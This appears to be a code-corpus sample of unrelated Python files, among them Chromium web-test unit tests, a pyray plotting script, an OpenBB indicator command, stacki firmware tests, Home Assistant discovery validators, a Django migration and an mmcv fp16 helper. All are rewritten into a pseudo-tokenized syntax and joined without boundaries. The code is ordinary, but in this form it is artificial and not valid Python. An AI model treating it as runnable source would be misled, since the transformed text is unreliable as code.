5<times>self.make_port().timeout_ms())<block_end><def_stmt>make_dcheck_port self options<block_start>host=MockSystemHost(os_name=self.os_name os_version=self.os_version)<line_sep>host.filesystem.write_text_file(self.make_port(host)._build_path('args.gn') 'is_debug=false\ndcheck_always_on = true # comment\n')<line_sep>port=self.make_port(host options=options)<line_sep><return>port<block_end><def_stmt>test_timeout_ms_with_dcheck self<block_start>default_timeout_ms=self.make_port().timeout_ms()<line_sep>self.assertEqual(self.make_dcheck_port(options=optparse.Values({'configuration':'Release'})).timeout_ms() 2<times>default_timeout_ms)<line_sep>self.assertEqual(self.make_dcheck_port(options=optparse.Values({'configuration':'Debug'})).timeout_ms() 5<times>default_timeout_ms)<block_end><def_stmt>test_driver_cmd_line self<block_start>port=self.make_port()<line_sep>self.assertTrue(len(port.driver_cmd_line()))<line_sep>options=optparse.Values(dict(additional_driver_flag=['--foo=bar' '--foo=baz']))<line_sep>port=self.make_port(options=options)<line_sep>cmd_line=port.driver_cmd_line()<line_sep>self.assertTrue('--foo=bar'<in>cmd_line)<line_sep>self.assertTrue('--foo=baz'<in>cmd_line)<block_end><def_stmt>test_diff_image__missing_both self<block_start>port=self.make_port()<line_sep>self.assertEqual(port.diff_image(<none> <none>) (<none> <none>))<line_sep>self.assertEqual(port.diff_image(<none> '') (<none> <none>))<line_sep>self.assertEqual(port.diff_image('' <none>) (<none> <none>))<line_sep>self.assertEqual(port.diff_image('' '') (<none> <none>))<block_end><def_stmt>test_diff_image__missing_actual self<block_start>port=self.make_port()<line_sep>self.assertEqual(port.diff_image(<none> 'foo') ('foo' <none>))<line_sep>self.assertEqual(port.diff_image('' 'foo') ('foo' <none>))<block_end><def_stmt>test_diff_image__missing_expected self<block_start>port=self.make_port()<line_sep>self.assertEqual(port.diff_image('foo' <none>) ('foo' <none>))<line_sep>self.assertEqual(port.diff_image('foo' '') ('foo' <none>))<block_end><def_stmt>test_diff_image self<block_start><def_stmt>_path_to_image_diff <block_start><return>'/path/to/image_diff'<block_end>port=self.make_port()<line_sep>port._path_to_image_diff=_path_to_image_diff<line_sep>mock_image_diff='MOCK Image Diff'<def_stmt>mock_run_command args<block_start>port.host.filesystem.write_binary_file(args[4] mock_image_diff)<line_sep><raise>ScriptError(exit_code=1)<block_end># Images are different. port._executive=MockExecutive(run_command_fn=mock_run_command)# pylint: disable=protected-access self.assertEqual(mock_image_diff port.diff_image('EXPECTED' 'ACTUAL')[0])<line_sep># Images are the same. port._executive=MockExecutive(exit_code=0)# pylint: disable=protected-access self.assertEqual(<none> port.diff_image('EXPECTED' 'ACTUAL')[0])<line_sep># There was some error running image_diff. port._executive=MockExecutive(exit_code=2)# pylint: disable=protected-access exception_raised=<false><try_stmt><block_start>port.diff_image('EXPECTED' 'ACTUAL')<block_end><except_stmt>ValueError<block_start>exception_raised=<true><block_end>self.assertFalse(exception_raised)<block_end><def_stmt>test_diff_image_crashed self<block_start>port=self.make_port()<line_sep>port._executive=MockExecutive(should_throw=<true> exit_code=2)# pylint: disable=protected-access self.assertEqual(port.diff_image('EXPECTED' 'ACTUAL') (<none> 'Image diff returned an exit code of 2. See http://crbug.com/278596'))<block_end><def_stmt>test_test_configuration self<block_start>port=self.make_port()<line_sep>self.assertTrue(port.test_configuration())<block_end><def_stmt>test_get_crash_log_all_none self<block_start>port=self.make_port()<line_sep>stderr,details,crash_site=port._get_crash_log(<none> <none> <none> <none> newer_than=<none>)<line_sep>self.assertIsNone(stderr)<line_sep>self.assertEqual(details b'crash log for <unknown process name> (pid <unknown>):\n'<concat>b'STDOUT: <empty>\n'<concat>b'STDERR: <empty>\n')<line_sep>self.assertIsNone(crash_site)<block_end><def_stmt>test_get_crash_log_simple self<block_start>port=self.make_port()<line_sep>stderr,details,crash_site=port._get_crash_log('foo' 1234 b'out bar\nout baz' b'err bar\nerr baz\n' newer_than=<none>)<line_sep>self.assertEqual(stderr b'err bar\nerr baz\n')<line_sep>self.assertEqual(details b'crash log for foo (pid 1234):\n'<concat>b'STDOUT: out bar\n'<concat>b'STDOUT: out baz\n'<concat>b'STDERR: err bar\n'<concat>b'STDERR: err baz\n')<line_sep>self.assertIsNone(crash_site)<block_end><def_stmt>test_get_crash_log_non_ascii self<block_start>port=self.make_port()<line_sep>stderr,details,crash_site=port._get_crash_log('foo' 1234 b'foo\xa6bar' b'foo\xa6bar' newer_than=<none>)<line_sep>self.assertEqual(stderr b'foo\xa6bar')<line_sep>self.assertEqual(details.decode('utf8' 'replace') u'crash log for foo (pid 1234):\n'<concat>u'STDOUT: foo\ufffdbar\n'<concat>u'STDERR: foo\ufffdbar\n')<line_sep>self.assertIsNone(crash_site)<block_end><def_stmt>test_get_crash_log_newer_than self<block_start>port=self.make_port()<line_sep>stderr,details,crash_site=port._get_crash_log('foo' 1234 b'foo\xa6bar' b'foo\xa6bar' newer_than=1.0)<line_sep>self.assertEqual(stderr b'foo\xa6bar')<line_sep>self.assertEqual(details.decode('utf8' 'replace') u'crash log for foo (pid 1234):\n'<concat>u'STDOUT: foo\ufffdbar\n'<concat>u'STDERR: foo\ufffdbar\n')<line_sep>self.assertIsNone(crash_site)<block_end><def_stmt>test_get_crash_log_crash_site self<block_start>port=self.make_port()<line_sep>stderr,details,crash_site=port._get_crash_log('foo' 1234 b'out bar' b'[1:2:3:4:FATAL:example.cc(567)] Check failed.' newer_than=<none>)<line_sep>self.assertEqual(stderr b'[1:2:3:4:FATAL:example.cc(567)] Check failed.')<line_sep>self.assertEqual(details b'crash log for foo (pid 1234):\n'<concat>b'STDOUT: out bar\n'<concat>b'STDERR: [1:2:3:4:FATAL:example.cc(567)] Check failed.\n')<line_sep>self.assertEqual(crash_site 'example.cc(567)')<block_end><def_stmt>test_default_expectations_files self<block_start>port=self.make_port()<line_sep>self.assertEqual(list(port.default_expectations_files()) [port.path_to_generic_test_expectations_file() port.path_to_webdriver_expectations_file() port.host.filesystem.join(port.web_tests_dir() 'NeverFixTests') port.host.filesystem.join(port.web_tests_dir() 'StaleTestExpectations') port.host.filesystem.join(port.web_tests_dir() 'SlowTests') ])<block_end><def_stmt>test_default_expectations_ordering self<block_start>port=self.make_port()<for_stmt>path port.default_expectations_files()<block_start>port.host.filesystem.write_text_file(path '')<block_end>ordered_dict=port.expectations_dict()<line_sep>self.assertEqual(port.path_to_generic_test_expectations_file() list(ordered_dict)[0])<line_sep>options=optparse.Values(dict(additional_expectations=['/tmp/foo' '/tmp/bar']))<line_sep>port=self.make_port(options=options)<for_stmt>path port.default_expectations_files()<block_start>port.host.filesystem.write_text_file(path '')<block_end>port.host.filesystem.write_text_file('/tmp/foo' 'foo')<line_sep>port.host.filesystem.write_text_file('/tmp/bar' 'bar')<line_sep>ordered_dict=port.expectations_dict()<line_sep>self.assertEqual(list(ordered_dict)[-2:] options.additional_expectations)<line_sep>self.assertEqual(list(ordered_dict.values())[-2:] ['foo' 'bar'])<block_end><def_stmt>test_used_expectations_files self<block_start>options=optparse.Values({'additional_expectations':['/tmp/foo'] 'additional_driver_flag':['flag-specific']})<line_sep>port=self.make_port(options=options)<line_sep>self.assertEqual(list(port.used_expectations_files()) [port.path_to_generic_test_expectations_file() port.path_to_webdriver_expectations_file() port.host.filesystem.join(port.web_tests_dir() 'NeverFixTests') port.host.filesystem.join(port.web_tests_dir() 'StaleTestExpectations') port.host.filesystem.join(port.web_tests_dir() 'SlowTests') port.host.filesystem.join(port.web_tests_dir() 'FlagExpectations' 'flag-specific') '/tmp/foo' ])<block_end><def_stmt>test_path_to_apache_config_file self# Specific behavior may vary by port, so unit test sub-classes may override this. <block_start>port=self.make_port()<line_sep>port.host.environ['WEBKIT_HTTP_SERVER_CONF_PATH']='/path/to/httpd.conf'<with_stmt>self.assertRaises(IOError)<block_start>port.path_to_apache_config_file()<block_end>port.host.filesystem.write_text_file('/existing/httpd.conf' 'Hello, world!')<line_sep>port.host.environ['WEBKIT_HTTP_SERVER_CONF_PATH']='/existing/httpd.conf'<line_sep>self.assertEqual(port.path_to_apache_config_file() '/existing/httpd.conf')<line_sep># Mock out _apache_config_file_name_for_platform to avoid mocking platform info. port._apache_config_file_name_for_platform=<lambda>:'httpd.conf'<del_stmt>port.host.environ['WEBKIT_HTTP_SERVER_CONF_PATH']<line_sep>self.assertEqual(port.path_to_apache_config_file() port.host.filesystem.join(port.apache_config_directory() 'httpd.conf'))<line_sep># Check that even if we mock out _apache_config_file_name, the environment variable takes precedence. port.host.environ['WEBKIT_HTTP_SERVER_CONF_PATH']='/existing/httpd.conf'<line_sep>self.assertEqual(port.path_to_apache_config_file() '/existing/httpd.conf')<block_end><def_stmt>test_additional_platform_directory self<block_start>port=self.make_port(options=optparse.Values(dict(additional_platform_directory=['/tmp/foo'])))<line_sep>self.assertEqual(port.baseline_search_path()[0] '/tmp/foo')<block_end><def_stmt>test_virtual_test_suites self# We test that we can load the real web_tests/VirtualTestSuites file properly, so we # use a real SystemHost(). We don't care what virtual_test_suites() returns as long # as it is iterable. <block_start>port=self.make_port(host=SystemHost() port_name=self.full_port_name)<line_sep>self.assertTrue(isinstance(port.virtual_test_suites() collections.Iterable))<block_end><block_end>
<import_stmt>numpy<as>np<import_from_stmt>pyray.shapes.twod.paraboloid *<import_from_stmt>pyray.shapes.twod.functional *<import_from_stmt>pyray.rotation *<import_from_stmt>mpl_toolkits.mplot3d Axes3D<import_stmt>matplotlib.pyplot<as>plt<import_from_stmt>matplotlib cm<import_from_stmt>matplotlib.ticker LinearLocator FormatStrFormatter<import_stmt>matplotlib<as>mpl<import_stmt>os<line_sep>basedir='.\\Images\\RotatingCube\\'<if_stmt>os.name<eq>'posix'<block_start>basedir='Images/RotatingCube/'<block_end><def_stmt>draw_cubic <block_start>fn=<lambda>x y:x<power>3+y<power>3<for_stmt>i range(20)<block_start>im=Image.new("RGB" (2048 2048) "black")<line_sep>draw=ImageDraw.Draw(im 'RGBA')<line_sep>r=general_rotation(np.array([1 0 0]) np.pi/120<times>i)<line_sep>#drawFunctionalXYGridInCircle(draw, r, fn=fn, scale=10.0) im.save(basedir+'im'+str(i)+'.png')<block_end><block_end><def_stmt>three_d_grid <block_start>fig=plt.figure()<line_sep>ax=fig.gca(projection='3d')<line_sep># Make data. X=np.arange(-5 5 0.25)<line_sep>Y=np.arange(-5 5 0.25)<line_sep>X,Y=np.meshgrid(X Y)<line_sep>R=(X<power>3+Y<power>3)<line_sep>Z=R<line_sep># Plot the surface. surf=ax.plot_surface(X Y Z cmap=cm.coolwarm linewidth=0 antialiased=<false>)<line_sep># Customize the z axis. #ax.set_zlim(-1.01, 1.01) #ax.zaxis.set_major_locator(LinearLocator(10)) #ax.zaxis.set_major_formatter(FormatStrFormatter('%.02f')) # Add a color bar which maps values to colors. fig.colorbar(surf shrink=0.5 aspect=5)<line_sep>plt.show()<block_end>mpl.rcParams['legend.fontsize']=10<line_sep>fig=plt.figure()<line_sep>ax=fig.gca(projection='3d')<line_sep>theta=np.linspace(0 2<times>np.pi 100)<for_stmt>r np.arange(0.1 1.0 0.1)#r = 1.0 <block_start>x=r<times>np.sin(theta)<line_sep>y=r<times>np.cos(theta)<line_sep>z=x<power>3+y<power>3<line_sep>ax.plot(x y z label='parametric curve')<line_sep>#ax.legend() <block_end>plt.show()<def_stmt>paraboloid_w_grad im_ind=0 scale=200 shift=np.array([1000 1000 0]) opacity=60 basepath='.\\'<block_start>r1=np.eye(4)<line_sep>rot=general_rotation(np.array([0 0 1]) np.pi/20.0<times>(8+im_ind/3.0))<line_sep>j=4<line_sep>r=rotation(3 2<times>np.pi<times>j/30.0)<line_sep>rr=general_rotation(np.array([0 1 0]) np.pi/20.0<times>(im_ind/7.0))<line_sep>r=np.dot(r rr)<line_sep>r=np.dot(r rot)<line_sep>r1[:3 :3]=r<line_sep>im=Image.new("RGB" (2048 2048) "black")<line_sep>draw=ImageDraw.Draw(im 'RGBA')<line_sep>render_scene_4d_axis(draw r1 4 scale shift)<line_sep># This is what draws the pink paraboloid. <for_stmt>z np.arange(0.001 3.5 0.02)<block_start>point1=np.array([np.sqrt(z) 0 z])<line_sep>generalized_arc(draw r center=np.array([0 0 z]) vec=np.array([0 0 1]) point=point1 radius=np.sqrt(z) prcnt=1.0 rgba=(255 20 147 50))<block_end>xax1=np.array([-100.0 0 0.0])<line_sep>xax1=np.dot(r xax1)<times>scale+shift<line_sep>xax2=np.array([100.0 0 0.0])<line_sep>xax2=np.dot(r xax2)<times>scale+shift<line_sep>draw.line((xax1[0] xax1[1] xax2[0] xax2[1]) fill=(255 255 0) width=4)<line_sep>xax1=np.array([0.0 -100 0.0])<line_sep>xax1=np.dot(r xax1)<times>scale+shift<line_sep>xax2=np.array([0.0 100 0.0])<line_sep>xax2=np.dot(r xax2)<times>scale+shift<line_sep>draw.line((xax1[0] xax1[1] xax2[0] xax2[1]) fill=(255 255 0) width=4)<line_sep>#gradients(draw,r) pt=shift<line_sep>draw.ellipse((pt[0]-10 pt[1]-10 pt[0]+10 pt[1]+10) fill=(0 255 0))<line_sep>draw_paraboloid_plane(draw r 3.3)<line_sep>draw_paraboloid_plane(draw r 2.0 extent=1.4)<line_sep>draw_paraboloid_plane(draw r 1.0 extent=1.0)<line_sep>im.save(basepath+'im'+str(im_ind)+'.png')<block_end><def_stmt>gradients draw r#for z in [0.3,1.3,2.3,3.3]: <block_start><for_stmt>z [3.3 2.0 1.0]<block_start>x=np.sqrt(z)<for_stmt>x np.arange(-x x x/2)<block_start>y=np.sqrt(z-x<times>x)<line_sep>arrowV1(draw r np.array([y x z]) np.array([1.5<times>y 1.5<times>x z]) (204 102 255))<if_stmt>z<g>3.0<block_start>arrowV1(draw r np.array([-y x z]) np.array([-1.5<times>y 1.5<times>x z]) (204 102 255))<block_end><block_end><block_end><block_end><def_stmt>draw_paraboloid_plane draw r z=3.3 scale=200 shift=np.array([1000 1000 0]) extent=2<block_start>pt1=np.array([extent extent z])<line_sep>pt1=np.dot(r pt1)<times>scale+shift<line_sep>pt2=np.array([extent -extent z])<line_sep>pt2=np.dot(r pt2)<times>scale+shift<line_sep>pt3=np.array([-extent -extent z])<line_sep>pt3=np.dot(r pt3)<times>scale+shift<line_sep>pt4=np.array([-extent extent z])<line_sep>pt4=np.dot(r pt4)<times>scale+shift<line_sep>draw.polygon([(pt1[0] pt1[1]) (pt2[0] pt2[1]) (pt3[0] pt3[1]) (pt4[0] pt4[1])] (0 102 255 50))<line_sep>point1=np.array([np.sqrt(z) 0 z])<line_sep>generalized_arc(draw r center=np.array([0 0 z]) vec=np.array([0 0 1]) point=point1 radius=np.sqrt(z) prcnt=1.0 scale=scale rgba=(255 20 10 100) width=10)<block_end><def_stmt>plane_w_arrows im_ind=0 scale=200 shift=np.array([824 824 0]) basepath='.\\'<block_start>r1=np.eye(4)<line_sep>rot=general_rotation(np.array([0 0 1]) np.pi/20.0<times>(8+im_ind/3.0))<line_sep>j=4<line_sep>r=rotation(3 2<times>np.pi<times>j/30.0)<line_sep>rr=general_rotation(np.array([0 1 0]) np.pi/20.0<times>(im_ind/7.0))<line_sep>r=np.dot(r rr)<line_sep>r=np.dot(r rot)<line_sep>r1[:3 :3]=r<line_sep>im=Image.new("RGB" (1648 1648) "black")<line_sep>draw=ImageDraw.Draw(im 'RGBA')<line_sep>pt1=3<times>np.array([1.0 -1.0 0])<line_sep>pt2=3<times>np.array([1.0 1.0 0])<line_sep>z=1.2<power>2+1<line_sep>pt3=3<times>np.array([-1.0 1.0 0])<line_sep>pt4=3<times>np.array([-1.0 -1.0 0])<line_sep>pt1=np.dot(r pt1)<times>scale+shift<line_sep>pt2=np.dot(r pt2)<times>scale+shift<line_sep>pt3=np.dot(r pt3)<times>scale+shift<line_sep>pt4=np.dot(r pt4)<times>scale+shift<line_sep>draw.polygon([(pt1[0] pt1[1]) (pt2[0] pt2[1]) (pt3[0] pt3[1]) (pt4[0] pt4[1])] (0 102 255 50))<line_sep>draw_arrows(draw r rgba=(255 250 47) shift=shift)<line_sep>draw_arrows(draw r rot_angl=np.pi/2.0 rgba=(73 200 250) shift=shift)<line_sep>draw_arrows(draw r rot_angl=np.pi/2.0+np.pi/3 rgba=(255 20 147) shift=shift)<line_sep>arrowV1(draw r np.array([0 0 0]) np.array([0 0 2.5]) shift=shift rgb=(20 200 25))<line_sep>arrowV1(draw r np.array([0 0 0]) np.array([0 0 -2.5]) shift=shift rgb=(255 20 25))<line_sep>im.save(basepath+'im'+str(im_ind)+'.png')<block_end><def_stmt>draw_arrows draw r rot_angl=np.pi/6.0 rgba=(255 20 147) shift=np.array([1000 1000 0])<block_start>base=np.array([0 0 1.5])<for_stmt>theta np.arange(0 np.pi<times>2 2<times>np.pi/3)<block_start>a=np.array([np.cos(theta) np.sin(theta) 0])<line_sep>rr=general_rotation(a rot_angl)<line_sep>arrow1=np.dot(rr base)<line_sep>arrowV1(draw r np.array([0 0 0]) arrow1 rgb=rgba shift=shift)<block_end>rgba=rgba+(150 )<line_sep>generalized_arc(draw r center=np.array([0 0 1.5<times>np.cos(rot_angl)]) vec=np.array([0 0 1]) point=1.5<times>np.array([0 np.sin(rot_angl) np.cos(rot_angl)]) radius=100 prcnt=1.0 rgba=rgba shift=shift)<block_end>##################### ## Paraboloid with Lagrange visualized. im=Image.new("RGB" (2048 2048) (1 1 1))<line_sep>draw=ImageDraw.Draw(im 'RGBA')<line_sep>scale=5.0<line_sep>ind=0<line_sep>sep=24<line_sep>i=2.0<line_sep>base_coeff=0.02<line_sep>start_line=-12.0<line_sep>shift=np.array([1000.0 1000.0 0.0])<line_sep>r1=np.eye(4)<line_sep>j=24<line_sep>r=rotation(3 np.pi/30<times>j)<line_sep>r1[:3 :3]=r<line_sep>render_scene_4d_axis(draw r1 4)<line_sep>fn=<lambda>x y:paraboloid(x y coeff=i<times>base_coeff intercept=i)<line_sep>drawFunctionalXYGrid(draw r scale=scale fn=fn extent=60 rgba2=(255 20 147 80) saperatingPlane=np.array([-1 -1 sep]))<line_sep>three_d_parabola(draw r r2)<line_sep>im.save(basedir+'im'+str(0)+'.png')<line_sep>
<import_stmt>logging<import_stmt>plotly.graph_objects<as>go<import_from_stmt>bots imps load_candle<import_from_stmt>openbb_terminal.common.technical_analysis volume_model<import_from_stmt>openbb_terminal.decorators log_start_end<line_sep># pylint: disable=R0913 logger=logging.getLogger(__name__)<line_sep>@log_start_end(log=logger)<def_stmt>adosc_command ticker="" interval:int=15 past_days:int=0 is_open:bool=<false> fast="3" slow="10" start="" end="" extended_hours:bool=<false> heikin_candles:bool=<false> trendline:bool=<false> news:bool=<false> <block_start>"""Displays chart with chaikin oscillator [Yahoo Finance]"""<line_sep># Debug <if_stmt>imps.DEBUG# pylint: disable=logging-too-many-args <block_start>logger.debug("ta adosc %s %s %s %s %s %s %s %s %s %s %s %s" ticker interval past_days is_open fast slow start end extended_hours heikin_candles trendline news )<block_end># Check for argument <if_stmt>ticker<eq>""<block_start><raise>Exception("Stock ticker is required")<block_end><if_stmt><not>fast.lstrip("-").isnumeric()<block_start><raise>Exception("Number has to be an integer")<block_end>fast=int(fast)<if_stmt><not>slow.lstrip("-").isnumeric()<block_start><raise>Exception("Number has to be an integer")<block_end>slow=int(slow)<line_sep># Retrieve Data df_stock,start,end,bar_start=load_candle.stock_data(ticker=ticker interval=interval past_days=past_days extended_hours=extended_hours start=start end=end heikin_candles=heikin_candles )<if_stmt>df_stock.empty<block_start><raise>Exception("No Data Found")<block_end>df_ta=df_stock.loc[(df_stock.index<ge>start)&(df_stock.index<l>end)]<line_sep>df_ta=df_ta.join(volume_model.adosc(df_stock is_open fast slow))<line_sep># Output Data <if_stmt>interval<ne>1440<block_start>df_ta=df_ta.loc[(df_ta.index<ge>bar_start)&(df_ta.index<l>end)]<block_end>df_ta=df_ta.fillna(0.0)<line_sep>plot=load_candle.candle_fig(df_ta ticker interval extended_hours news bar=bar_start int_bar=interval trendline=trendline rows=2 cols=1 shared_xaxes=<true> vertical_spacing=0.05 row_width=[0.4 0.7] specs=[[{"secondary_y":<true>}] [{"secondary_y":<false>}] ] )<line_sep>title=f"<b>{plot['plt_title']} AD Oscillator</b>"<line_sep>fig=plot["fig"]<line_sep>fig.add_trace(go.Scatter(name="AD Osc [M]" mode="lines" x=df_ta.index y=df_ta.iloc[: 6].values<if>(<not>trendline)<and>(interval<ne>1440)<else>df_ta.iloc[: 11].values line=dict(width=2) opacity=1 ) row=2 col=1 )<line_sep>fig.update_layout(margin=dict(l=0 r=0 t=50 b=20) template=imps.PLT_TA_STYLE_TEMPLATE colorway=imps.PLT_TA_COLORWAY title=title title_x=0.1 title_font_size=14 dragmode="pan" )<line_sep>imagefile="ta_adosc.png"<line_sep># Check if interactive settings are enabled plt_link=""<if_stmt>imps.INTERACTIVE<block_start>plt_link=imps.inter_chart(fig imagefile callback=<false>)<block_end>imagefile=imps.image_border(imagefile fig=fig)<line_sep><return>{"title":f"Stocks: Accumulation/Distribution Oscillator {ticker.upper()}" "description":plt_link "imagefile":imagefile }<block_end>
<import_stmt>json<import_stmt>pytest<line_sep>@pytest.mark.parametrize("hosts, expected_results" (("" [{"host":"backend-0-0" "version":"1.2.3" "make":"mellanox" "model":"m7800"} {"host":"backend-0-1" "version":"1.2.3.4" "make":"dell" "model":"x1052-software"} ] ) ("backend-0-0" [{"host":"backend-0-0" "version":"1.2.3" "make":"mellanox" "model":"m7800"}]) ("backend-0-1" [{"host":"backend-0-1" "version":"1.2.3.4" "make":"dell" "model":"x1052-software"}]) ) )<def_stmt>test_list_host_firmware_mapping_host_filter host add_host_with_net fake_local_firmware_file revert_firmware hosts expected_results <block_start>"""Test that list host firmware mapping filters correctly based on provided arguments."""<line_sep># Add a backend-0-1 add_host_with_net(hostname="backend-0-1" rack=0 rank=1 appliance="backend" interface="eth0" ip="192.168.1.1" network="fake_net" address="192.168.1.0" pxe=<true> )<line_sep># Add a piece of mellanox firmware to backend-0-0. result=host.run(f"stack add firmware 1.2.3 make=mellanox model=m7800 source={fake_local_firmware_file} hosts=backend-0-0")<assert_stmt>result.rc<eq>0<line_sep># Add a piece of dell firmware to backend-0-1 result=host.run(f"stack add firmware 1.2.3.4 make=dell model=x1052-software source={fake_local_firmware_file} hosts=backend-0-1")<assert_stmt>result.rc<eq>0<line_sep># List the firmware mappings result=host.run(f"stack list host firmware mapping {hosts} output-format=json")<assert_stmt>result.rc<eq>0<assert_stmt>expected_results<eq>json.loads(result.stdout)<block_end>@pytest.mark.parametrize("make, model, versions, expected_results" (("" "" "" [{"host":"backend-0-0" "version":"1.2.3" "make":"mellanox" "model":"m7800"} {"host":"backend-0-1" "version":"1.2.3.4" "make":"dell" "model":"x1052-software"} ] ) ("mellanox" "" "" [{"host":"backend-0-0" "version":"1.2.3" "make":"mellanox" "model":"m7800"}]) ("mellanox" "m7800" "" [{"host":"backend-0-0" "version":"1.2.3" "make":"mellanox" "model":"m7800"}]) ("mellanox" "m7800" "1.2.3" [{"host":"backend-0-0" "version":"1.2.3" "make":"mellanox" "model":"m7800"}]) ("dell" "" "" [{"host":"backend-0-1" "version":"1.2.3.4" "make":"dell" "model":"x1052-software"}]) ("dell" "x1052-software" "" [{"host":"backend-0-1" "version":"1.2.3.4" "make":"dell" "model":"x1052-software"}]) ("dell" "x1052-software" "1.2.3.4" [{"host":"backend-0-1" "version":"1.2.3.4" "make":"dell" "model":"x1052-software"}]) ) )<def_stmt>test_list_host_firmware_mapping_non_host_filter host add_host_with_net fake_local_firmware_file revert_firmware make model versions expected_results <block_start>"""Test that list host firmware mapping filters correctly based on provided arguments."""<line_sep># Add a backend-0-1 add_host_with_net(hostname="backend-0-1" rack=0 rank=1 appliance="backend" interface="eth0" ip="192.168.1.1" network="fake_net" address="192.168.1.0" pxe=<true> )<line_sep># Add a piece of mellanox firmware to backend-0-0. result=host.run(f"stack add firmware 1.2.3 make=mellanox model=m7800 source={fake_local_firmware_file} hosts=backend-0-0")<assert_stmt>result.rc<eq>0<line_sep># Add a piece of dell firmware to backend-0-1 result=host.run(f"stack add firmware 1.2.3.4 make=dell model=x1052-software source={fake_local_firmware_file} hosts=backend-0-1")<assert_stmt>result.rc<eq>0<line_sep># List the firmware mappings result=host.run(f"stack list host firmware mapping {f'make={make}'<if>make<else>''} {f'model={model}'<if>model<else>''} "<concat>f"{f'versions={versions}'<if>versions<else>''} output-format=json")<assert_stmt>result.rc<eq>0<assert_stmt>expected_results<eq>json.loads(result.stdout)<block_end>
"""Validate services schema."""<import_from_stmt>importlib import_module<import_from_stmt>pathlib Path<import_stmt>voluptuous<as>vol<import_from_stmt>..const ATTR_ADDON ATTR_CONFIG ATTR_DISCOVERY ATTR_SERVICE ATTR_UUID<import_from_stmt>..utils.validate schema_or<import_from_stmt>..validate uuid_match<def_stmt>valid_discovery_service service<block_start>"""Validate service name."""<line_sep>service_file=Path(__file__).parent.joinpath(f"services/{service}.py")<if_stmt><not>service_file.exists()<block_start><raise>vol.Invalid(f"Service {service} not found")<from><none><block_end><return>service<block_end><def_stmt>valid_discovery_config service config<block_start>"""Validate service name."""<try_stmt><block_start>service_mod=import_module(f".services.{service}" "supervisor.discovery")<block_end><except_stmt>ImportError<block_start><raise>vol.Invalid(f"Service {service} not found")<from><none><block_end><return>service_mod.SCHEMA(config)<block_end>SCHEMA_DISCOVERY=vol.Schema([vol.Schema({vol.Required(ATTR_UUID):uuid_match vol.Required(ATTR_ADDON):str vol.Required(ATTR_SERVICE):valid_discovery_service vol.Required(ATTR_CONFIG):vol.Maybe(dict) } extra=vol.REMOVE_EXTRA )])<line_sep>SCHEMA_DISCOVERY_CONFIG=vol.Schema({vol.Optional(ATTR_DISCOVERY default=list):schema_or(SCHEMA_DISCOVERY)} extra=vol.REMOVE_EXTRA )<line_sep>
load("//tools:defaults.bzl" "protractor_web_test_suite")<line_sep>""" Macro that can be used to define a e2e test in `modules/benchmarks`. Targets created through this macro differentiate from a "benchmark_test" as they will run on CI and do not run with `@angular/benchpress`. """<def_stmt>e2e_test name server **kwargs<block_start>protractor_web_test_suite(name=name on_prepare="@npm//@angular/dev-infra-private/bazel/benchmark/component_benchmark:start-server.js" server=server **kwargs)<block_end>
# -*- coding: utf-8 -*- # Generated by Django 1.9.7 on 2016-06-23 18:25 <import_from_future_stmt> unicode_literals<import_from_stmt>django.conf settings<import_from_stmt>django.db migrations models<import_stmt>django.db.models.deletion<class_stmt>Migration(migrations.Migration)<block_start>dependencies=[('filer' '0004_auto_20160328_1434') ]<line_sep>operations=[migrations.AlterField(model_name='file' name='owner' field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name='owned_files' to=settings.AUTH_USER_MODEL verbose_name='owner') ) migrations.AlterField(model_name='folder' name='owner' field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name='filer_owned_folders' to=settings.AUTH_USER_MODEL verbose_name='owner') ) migrations.AlterField(model_name='folderpermission' name='user' field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.SET_NULL related_name='filer_folder_permissions' to=settings.AUTH_USER_MODEL verbose_name='user') ) ]<block_end>
<import_stmt>functools<import_from_stmt>collections OrderedDict abc<import_from_stmt>inspect getfullargspec<import_stmt>numpy<as>np<import_stmt>torch<import_stmt>torch.distributed<as>dist<import_stmt>torch.nn<as>nn<import_from_stmt>torch._utils _flatten_dense_tensors _take_tensors _unflatten_dense_tensors <def_stmt>cast_tensor_type inputs src_type dst_type<block_start>"""Recursively convert Tensor in inputs from src_type to dst_type. Args: inputs: Inputs that to be casted. src_type (torch.dtype): Source type.. dst_type (torch.dtype): Destination type. Returns: The same type with inputs, but all contained Tensors have been cast. """<if_stmt>isinstance(inputs torch.Tensor)<block_start><return>inputs.to(dst_type)<block_end><elif_stmt>isinstance(inputs str)<block_start><return>inputs<block_end><elif_stmt>isinstance(inputs np.ndarray)<block_start><return>inputs<block_end><elif_stmt>isinstance(inputs abc.Mapping)<block_start><return>type(inputs)({k:cast_tensor_type(v src_type dst_type)<for>k,v inputs.items()})<block_end><elif_stmt>isinstance(inputs abc.Iterable)<block_start><return>type(inputs)(cast_tensor_type(item src_type dst_type)<for>item inputs)<block_end><else_stmt><block_start><return>inputs<block_end><block_end><def_stmt>auto_fp16 apply_to=<none> out_fp32=<false><block_start>"""Decorator to enable fp16 training automatically. This decorator is useful when you write custom modules and want to support mixed precision training. If inputs arguments are fp32 tensors, they will be converted to fp16 automatically. Arguments other than fp32 tensors are ignored. Args: apply_to (Iterable, optional): The argument names to be converted. `None` indicates all arguments. out_fp32 (bool): Whether to convert the output back to fp32. Example: >>> import torch.nn as nn >>> class MyModule1(nn.Module): >>> >>> # Convert x and y to fp16 >>> @auto_fp16() >>> def forward(self, x, y): >>> pass >>> import torch.nn as nn >>> class MyModule2(nn.Module): >>> >>> # convert pred to fp16 >>> @auto_fp16(apply_to=('pred', )) >>> def do_something(self, pred, others): >>> pass """<def_stmt>auto_fp16_wrapper old_func<block_start>@functools.wraps(old_func)<def_stmt>new_func *args **kwargs# check if the module has set the attribute `fp16_enabled`, if not, # just fallback to the original method. <block_start><if_stmt><not>isinstance(args[0] torch.nn.Module)<block_start><raise>TypeError('@auto_fp16 can only be used to decorate the '<concat>'method of nn.Module')<block_end><if_stmt><not>(hasattr(args[0] 'fp16_enabled')<and>args[0].fp16_enabled)<block_start><return>old_func(*args **kwargs)<block_end># get the arg spec of the decorated method args_info=getfullargspec(old_func)<line_sep># get the argument names to be casted args_to_cast=args_info.args<if>apply_to<is><none><else>apply_to<line_sep># convert the args that need to be processed new_args=[]<line_sep># NOTE: default args are not taken into consideration <if_stmt>args<block_start>arg_names=args_info.args[:len(args)]<for_stmt>i,arg_name 